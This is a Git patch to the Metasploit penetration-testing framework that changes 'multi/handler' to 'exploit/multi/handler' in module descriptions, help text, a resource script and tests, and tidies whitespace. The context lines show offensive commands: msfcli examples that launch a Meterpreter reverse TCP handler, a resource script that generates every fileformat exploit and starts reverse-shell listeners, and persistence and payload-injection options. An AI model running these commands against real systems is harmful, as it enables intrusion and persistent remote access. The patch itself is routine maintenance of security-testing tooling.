From a53ca53a6a04a0460ac9a6e4957cb6675770e082 Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Fri, 12 Jun 2015 21:23:51 +0100 Subject: [PATCH] Fix inconstancy - multi/handler --- .../browser/persits_xupload_traversal.rb | 2 +- .../windows/mssql/mssql_linkcrawler.rb | 22 +-- .../post/multi/manage/shell_to_meterpreter.rb | 10 +- modules/post/multi/manage/system_session.rb | 6 +- .../manage/multi_meterpreter_inject.rb | 2 +- modules/post/windows/manage/payload_inject.rb | 6 +- msfcli | 4 +- scripts/meterpreter/duplicate.rb | 2 +- scripts/meterpreter/metsvc.rb | 4 +- scripts/meterpreter/multi_meter_inject.rb | 2 +- scripts/meterpreter/persistence.rb | 4 +- scripts/meterpreter/vnc.rb | 4 +- scripts/resource/fileformat_generator.rc | 146 +++++++++--------- spec/msfcli_spec.rb | 12 +- 14 files changed, 113 insertions(+), 113 deletions(-) diff --git a/modules/exploits/windows/browser/persits_xupload_traversal.rb b/modules/exploits/windows/browser/persits_xupload_traversal.rb index 8d96cd5d2b..2441f5ff05 100644 --- a/modules/exploits/windows/browser/persits_xupload_traversal.rb +++ b/modules/exploits/windows/browser/persits_xupload_traversal.rb @@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote an attacker is able to write arbitrary files to arbitrary locations on disk. Code execution occurs by writing to the All Users Startup Programs directory. - You may want to combine this module with the use of multi/handler since a + You may want to combine this module with the use of exploit/multi/handler since a user would have to log for the payload to execute. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index 1d64c7ae25..e03b2907be 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote If you are attempting to obtain multiple reverse shells using this module we recommend setting the "DisablePayloadHandler" advanced option to "true", and setting - up a multi/handler to run in the background as a job to support multiple incoming + up a exploit/multi/handler to run in the background as a job to support multiple incoming shells. If you are interested in deploying payloads to spefic servers this module also @@ -89,17 +89,17 @@ class Metasploit3 < Msf::Exploit::Remote # Define master array to keep track of enumerated database information masterList = Array.new - masterList[0] = Hash.new # Define new hash - masterList[0]["name"] = "" # Name of the current database server - masterList[0]["db_link"] = "" # Name of the linked database server - masterList[0]["db_user"] = "" # User configured on the database server link - masterList[0]["db_sysadmin"] = "" # Specifies if the database user configured for the link has sysadmin privileges - masterList[0]["db_version"] = "" # Database version of the linked database server - masterList[0]["db_os"] = "" # OS of the linked database server - masterList[0]["path"] = [[]] # Link path used during crawl - all possible link paths stored - masterList[0]["done"] = 0 # Used to determine if linked need to be crawled + masterList[0] = Hash.new # Define new hash + masterList[0]["name"] = "" # Name of the current database server + masterList[0]["db_link"] = "" # Name of the linked database server + masterList[0]["db_user"] = "" # User configured on the database server link + masterList[0]["db_sysadmin"] = "" # Specifies if the database user configured for the link has sysadmin privileges + masterList[0]["db_version"] = "" # Database version of the linked database server + masterList[0]["db_os"] = "" # OS of the linked database server + masterList[0]["path"] = [[]] # Link path used during crawl - all possible link paths stored + masterList[0]["done"] = 0 # Used to determine if linked need to be crawled - shelled = Array.new # keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system + shelled = Array.new # keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system # Setup query for gathering information from database servers versionQuery = "select @@servername,system_user,is_srvrolemember('sysadmin'),(REPLACE(REPLACE(REPLACE\ diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb index 7038742da4..ab80250ffc 100644 --- a/modules/post/multi/manage/shell_to_meterpreter.rb +++ b/modules/post/multi/manage/shell_to_meterpreter.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]), OptBool.new('HANDLER', - [ true, 'Start an Exploit Multi Handler to receive the connection', true]) + [ true, 'Start an exploit/multi/handler to receive the connection', true]) ], self.class) deregister_options('PERSIST', 'PSH_OLD_METHOD', 'RUN_WOW64') end @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Post if datastore['HANDLER'] listener_job_id = create_multihandler(lhost, lport, payload_name) if listener_job_id.blank? - print_error("Failed to start multi/handler on #{datastore['LPORT']}, it may be in use by another process.") + print_error("Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.") return nil end end @@ -208,7 +208,7 @@ class Metasploit3 < Msf::Post timer += 1 end end - print_status('Stopping multi/handler') + print_status('Stopping exploit/multi/handler') framework.jobs.stop_job(listener_job_id) } end @@ -238,12 +238,12 @@ class Metasploit3 < Msf::Post return false end - # Starts a multi/handler session + # Starts a exploit/multi/handler session def create_multihandler(lhost, lport, payload_name) pay = client.framework.payloads.create(payload_name) pay.datastore['LHOST'] = lhost pay.datastore['LPORT'] = lport - print_status('Starting exploit multi handler') + print_status('Starting exploit/multi/handler') if !check_for_listener(lhost, lport) # Set options for module mh = client.framework.exploits.create('multi/handler') diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb index 5aac76272c..299cd0a965 100644 --- a/modules/post/multi/manage/system_session.rb +++ b/modules/post/multi/manage/system_session.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Post OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]), OptBool.new('HANDLER', - [ true, 'Start an Exploit Multi Handler to receive the connection', false]), + [ true, 'Start an exploit/multi/handler to receive the connection', false]), OptEnum.new('TYPE', [true, 'Scripting environment on target to use for reverse shell', 'auto', ['auto','ruby','python','perl','bash']]) ], self.class) @@ -111,12 +111,12 @@ class Metasploit3 < Msf::Post return conflict end - # Starts a multi/handler session + # Starts a exploit/multi/handler session def create_multihand(lhost,lport) pay = client.framework.payloads.create("generic/shell_reverse_tcp") pay.datastore['LHOST'] = lhost pay.datastore['LPORT'] = lport - print_status("Starting exploit multi handler") + print_status("Starting exploit/multi/handler") if not check_for_listner(lhost,lport) # Set options for module mul = client.framework.exploits.create("multi/handler") diff --git a/modules/post/windows/manage/multi_meterpreter_inject.rb b/modules/post/windows/manage/multi_meterpreter_inject.rb index 58ba395bd1..222a7b9784 100644 --- a/modules/post/windows/manage/multi_meterpreter_inject.rb +++ b/modules/post/windows/manage/multi_meterpreter_inject.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Post OptInt.new('LPORT', [false, 'Port number for the payload LPORT variable.', 4444]), OptString.new('IPLIST', [true, 'List of semicolom separated IP list.', Rex::Socket.source_address("1.2.3.4")]), OptString.new('PIDLIST', [false, 'List of semicolom separated PID list.', '']), - OptBool.new('HANDLER', [false, 'Start new multi/handler job on local box.', false]), + OptBool.new('HANDLER', [false, 'Start new exploit/multi/handler job on local box.', false]), OptInt.new('AMOUNT', [false, 'Select the amount of shells you want to spawn.', 1]) ], self.class) diff --git a/modules/post/windows/manage/payload_inject.rb b/modules/post/windows/manage/payload_inject.rb index 8ba2e5a8a9..10c6317646 100644 --- a/modules/post/windows/manage/payload_inject.rb +++ b/modules/post/windows/manage/payload_inject.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post OptAddress.new('LHOST', [true, 'IP of host that will receive the connection from the payload.']), OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]), OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']), - OptBool.new('HANDLER', [ false, 'Start an Exploit Multi Handler to receive the connection', false]), + OptBool.new('HANDLER', [ false, 'Start an exploit/multi/handler to receive the connection', false]), OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format."]), OptInt.new('AMOUNT', [false, 'Select the amount of shells you want to spawn.', 1]) ], self.class) @@ -112,9 +112,9 @@ class Metasploit3 < Msf::Post return pay end - # Starts a multi/handler session + # Starts a exploit/multi/handler session def create_multihand(pay,pay_name,lhost,lport) - print_status("Starting exploit multi handler") + print_status("Starting exploit/multi/handler") if not check_for_listner(lhost,lport) # Set options for module mul = client.framework.exploits.create("multi/handler") diff --git a/msfcli b/msfcli index 37c1e214ac..911b32e920 100755 --- a/msfcli +++ b/msfcli @@ -95,7 +95,7 @@ class Msfcli $stdout.puts "Error: #{str}\n\n" if str $stdout.puts tbl.to_s + "\n" $stdout.puts "Examples:" + "\n" - $stdout.puts "msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E" + "\n" + $stdout.puts "msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E" + "\n" $stdout.puts "msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E" + "\n" $stdout.puts extra + "\n" if extra $stdout.puts @@ -542,7 +542,7 @@ class Msfcli show_payloads(modules) end when "t" - puts + puts if modules[:module].file_path =~ /auxiliary\//i $stdout.puts("\nError: This type of module does not support targets") else diff --git a/scripts/meterpreter/duplicate.rb b/scripts/meterpreter/duplicate.rb index 89caeba6ca..080f9ded93 100644 --- a/scripts/meterpreter/duplicate.rb +++ b/scripts/meterpreter/duplicate.rb @@ -23,7 +23,7 @@ opts = Rex::Parser::Arguments.new( "-e" => [ true, "Executable to inject into. Default notepad.exe, will fall back to spawn if not found."], "-P" => [ true, "Process id to inject into; use instead of -e if multiple copies of one executable are running."], "-s" => [ false, "Spawn new executable to inject to. Only useful with -P."], - "-D" => [ false, "Disable the automatic multi/handler (use with -r to accept on another system)"] + "-D" => [ false, "Disable the automatic exploit/multi/handler (use with -r to accept on another system)"] ) # diff --git a/scripts/meterpreter/metsvc.rb b/scripts/meterpreter/metsvc.rb index 253de080f8..7eafcef435 100644 --- a/scripts/meterpreter/metsvc.rb +++ b/scripts/meterpreter/metsvc.rb @@ -18,7 +18,7 @@ session = client opts = Rex::Parser::Arguments.new( "-h" => [ false, "This help menu"], "-r" => [ false, "Uninstall an existing Meterpreter service (files must be deleted manually)"], - "-A" => [ false, "Automatically start a matching multi/handler to connect to the service"] + "-A" => [ false, "Automatically start a matching exploit/multi/handler to connect to the service"] ) # Exec a command and return the results @@ -117,7 +117,7 @@ if client.platform =~ /win32|win64/ end # - # Setup the multi/handler if requested + # Setup the exploit/multi/handler if requested # if(autoconn) print_status("Trying to connect to the Meterpreter service at #{client.session_host}:#{rport}...") diff --git a/scripts/meterpreter/multi_meter_inject.rb b/scripts/meterpreter/multi_meter_inject.rb index 36a36e7f58..575c24f8ad 100644 --- a/scripts/meterpreter/multi_meter_inject.rb +++ b/scripts/meterpreter/multi_meter_inject.rb @@ -21,7 +21,7 @@ start_handler = nil @exec_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help menu." ], "-p" => [ true, "The port on the remote host where Metasploit is listening (default: 4444)"], - "-m" => [ false, "Start Exploit multi/handler for return connection"], + "-m" => [ false, "Start exploit/multi/handler for return connection"], "-pt" => [ true, "Specify Reverse Connection Meterpreter Payload. Default windows/meterpreter/reverse_tcp"], "-mr" => [ true, "Provide Multiple IP Addresses for Connections separated by comma."], "-mp" => [ true, "Provide Multiple PID for connections separated by comma one per IP."] diff --git a/scripts/meterpreter/persistence.rb b/scripts/meterpreter/persistence.rb index f9edcd7f90..9cfd185d25 100644 --- a/scripts/meterpreter/persistence.rb +++ b/scripts/meterpreter/persistence.rb @@ -35,7 +35,7 @@ script_on_target = nil "-X" => [ false, "Automatically start the agent when the system boots"], "-U" => [ false, "Automatically start the agent when the User logs on"], "-S" => [ false, "Automatically start the agent on boot as a service (with SYSTEM privileges)"], - "-A" => [ false, "Automatically start a matching multi/handler to connect to the agent"], + "-A" => [ false, "Automatically start a matching exploit/multi/handler to connect to the agent"], "-L" => [ true, "Location in target host to write payload to, if none \%TEMP\% will be used."], "-T" => [ true, "Alternate executable template to use"], "-P" => [ true, "Payload to use, default is windows/meterpreter/reverse_tcp."] @@ -237,7 +237,7 @@ raw = create_payload(payload_type, rhost, rport) script = create_script(delay, altexe, raw, payload_type.include?('/x64/')) script_on_target = write_script_to_target(target_dir, script) -# Start Multi/Handler +# Start exploit/multi/handler if autoconn set_handler(payload_type, rhost, rport) end diff --git a/scripts/meterpreter/vnc.rb b/scripts/meterpreter/vnc.rb index 8151145334..2ebfd24bae 100644 --- a/scripts/meterpreter/vnc.rb +++ b/scripts/meterpreter/vnc.rb @@ -21,7 +21,7 @@ opts = Rex::Parser::Arguments.new( "-v" => [ true, "The local port for the VNC proxy service (default: 5900)"], "-i" => [ false, "Inject the vnc server into a new process's memory instead of building an exe"], "-P" => [ true, "Executable to inject into (starts a new process). Only useful with -i (default: notepad.exe)"], - "-D" => [ false, "Disable the automatic multi/handler (use with -r to accept on another system)"], + "-D" => [ false, "Disable the automatic exploit/multi/handler (use with -r to accept on another system)"], "-O" => [ false, "Disable binding the VNC proxy to localhost (open it to the network)"], "-V" => [ false, "Disable the automatic launch of the VNC client"], "-t" => [ false, "Tunnel through the current session connection. (Will be slower)"], @@ -176,7 +176,7 @@ else end if tunnel - # Set up a port forward for the multi/handler to use for uploading the stage + # Set up a port forward for the exploit/multi/handler to use for uploading the stage print_status("Starting the port forwarding from #{rport} => TARGET:#{rport}") client.run_cmd("portfwd add -L 127.0.0.1 -l #{rport} -p #{rport} -r #{lhost}") end diff --git a/scripts/resource/fileformat_generator.rc b/scripts/resource/fileformat_generator.rc index 3e3a5657ff..96cbff3208 100644 --- a/scripts/resource/fileformat_generator.rc +++ b/scripts/resource/fileformat_generator.rc @@ -1,42 +1,42 @@ if (framework.datastore['WIN_PAYL'] != nil) - winpayl = framework.datastore['WIN_PAYL'] + winpayl = framework.datastore['WIN_PAYL'] else - # no payload defined -> we use a messagebox payload :) - winpayl = "windows/messagebox" + # no payload defined -> we use a messagebox payload :) + winpayl = "windows/messagebox" end if (framework.datastore['OSX_PAYL'] != nil) - osxpayl = framework.datastore['OSX_PAYL'] + osxpayl = framework.datastore['OSX_PAYL'] else - # no payload defined -> we use a generic bind payload :) - osxpayl = "generic/shell_bind_tcp" + # no payload defined -> we use a generic bind payload :) + osxpayl = "generic/shell_bind_tcp" end if (framework.datastore['MULTI_PAYL'] != nil) - multipayl = framework.datastore['MULTI_PAYL'] + multipayl = framework.datastore['MULTI_PAYL'] else - # no payload defined -> we use a generic bind payload :) - multipayl = "generic/shell_bind_tcp" + # no payload defined -> we use a generic bind payload :) + multipayl = "generic/shell_bind_tcp" end if (framework.datastore['LHOST'] == nil and (winpayl =~ /reverse/ or osxpayl =~ /reverse/ or multipayl =~ /reverse/)) - print_error("please define a global LHOST Variable") - return + print_error("please define a global LHOST Variable") + return else - localIP = framework.datastore['LHOST'] + localIP = framework.datastore['LHOST'] end if (framework.datastore['VERBOSE'] == "true") - verbose = 1 #true + verbose = 1 #true else - verbose = 0 + verbose = 0 end if (framework.datastore['HANDLERS'] == "true") - handlers = 1 #true + handlers = 1 #true else - handlers = 0 + handlers = 0 end windows = false @@ -44,66 +44,66 @@ multi = false osx = false framework.exploits.each do |exploit,mod| - if(exploit.to_s =~ /fileformat/) - print_line("generating fileformat exploit: #{exploit.to_s}") - run_single("use #{exploit}") - if(exploit.to_s =~ /windows/) - #we need this info for starting the handlers - windows = true - #setting the payload - run_single("set PAYLOAD #{winpayl}") - if(winpayl =~ /reverse/) - run_single("set LHOST #{localIP}") - run_single("set LPORT 4444") - end - elsif(exploit.to_s =~ /multi/) - #we need this info for starting the handlers - multi = true - #setting the payload - run_single("set PAYLOAD #{multipayl}") - if(winpayl =~ /reverse/) - run_single("set LHOST #{localIP}") - run_single("set LPORT 5555") - end - elsif(exploit.to_s =~ /osx/) - #we need this info for starting the handlers - osx = true - #setting the payload - run_single("set PAYLOAD #{osxpayl}") - if(osxpayl =~ /reverse/) - run_single("set LHOST #{localIP}") - run_single("set LPORT 6666") - end - end - extension = active_module.datastore['FILENAME'].split('.').last - filename = exploit.split('/').last - run_single("set FILENAME #{filename}.#{extension}") - run_single("exploit") - print_line - end + if(exploit.to_s =~ /fileformat/) + print_line("generating fileformat exploit: #{exploit.to_s}") + run_single("use #{exploit}") + if(exploit.to_s =~ /windows/) + #we need this info for starting the handlers + windows = true + #setting the payload + run_single("set PAYLOAD #{winpayl}") + if(winpayl =~ /reverse/) + run_single("set LHOST #{localIP}") + run_single("set LPORT 4444") + end + elsif(exploit.to_s =~ /multi/) + #we need this info for starting the handlers + multi = true + #setting the payload + run_single("set PAYLOAD #{multipayl}") + if(winpayl =~ /reverse/) + run_single("set LHOST #{localIP}") + run_single("set LPORT 5555") + end + elsif(exploit.to_s =~ /osx/) + #we need this info for starting the handlers + osx = true + #setting the payload + run_single("set PAYLOAD #{osxpayl}") + if(osxpayl =~ /reverse/) + run_single("set LHOST #{localIP}") + run_single("set LPORT 6666") + end + end + extension = active_module.datastore['FILENAME'].split('.').last + filename = exploit.split('/').last + run_single("set FILENAME #{filename}.#{extension}") + run_single("exploit") + print_line + end end if(handlers == 1) - #starting some handlers for reverse connections - run_single("use multi/handler") - if(windows == true and winpayl =~ /reverse/) - run_single("set PAYLOAD #{winpayl}") - run_single("set LHOST #{localIP}") - run_single("set LPORT 4444") - run_single("exploit -j") - end - if(multi == true and multipayl =~ /reverse/) - run_single("set PAYLOAD #{multipayl}") - run_single("set LHOST #{localIP}") - run_single("set LPORT 5555") - run_single("exploit -j") - end - if(osx == true and osxpayl =~ /reverse/) - run_single("set PAYLOAD #{osxpayl}") - run_single("set LHOST #{localIP}") - run_single("set LPORT 6666") - run_single("exploit -j") - end + #starting some handlers for reverse connections + run_single("use exploit/multi/handler") + if(windows == true and winpayl =~ /reverse/) + run_single("set PAYLOAD #{winpayl}") + run_single("set LHOST #{localIP}") + run_single("set LPORT 4444") + run_single("exploit -j") + end + if(multi == true and multipayl =~ /reverse/) + run_single("set PAYLOAD #{multipayl}") + run_single("set LHOST #{localIP}") + run_single("set LPORT 5555") + run_single("exploit -j") + end + if(osx == true and osxpayl =~ /reverse/) + run_single("set PAYLOAD #{osxpayl}") + run_single("set LHOST #{localIP}") + run_single("set LPORT 6666") + run_single("exploit -j") + end end run_single("back") diff --git a/spec/msfcli_spec.rb b/spec/msfcli_spec.rb index d37908ed00..ce31679cd5 100644 --- a/spec/msfcli_spec.rb +++ b/spec/msfcli_spec.rb @@ -289,8 +289,8 @@ describe Msfcli, :content do } end end - - + + context "#guess_nop_name" do subject(:guess_nop_name) { msfcli.guess_nop_name(nop_reference_name) @@ -555,8 +555,8 @@ describe Msfcli, :content do expect(modules[:module].fullname).to eq(module_name) end end - - context 'with multi/handler' do + + context 'with exploit/multi/handler' do let(:module_name) { 'multi/handler' } @@ -571,14 +571,14 @@ describe Msfcli, :content do expect(modules[:module]).to be_an Msf::Exploit expect(modules[:module].refname).to eq(module_name) end - + context 'with payload' do let(:args) { super().tap { |args| args.insert(-2, "payload=#{payload_reference_name}") } } - + context 'windows/meterpreter/reverse_tcp' do let(:payload_reference_name) do 'windows/meterpreter/reverse_tcp'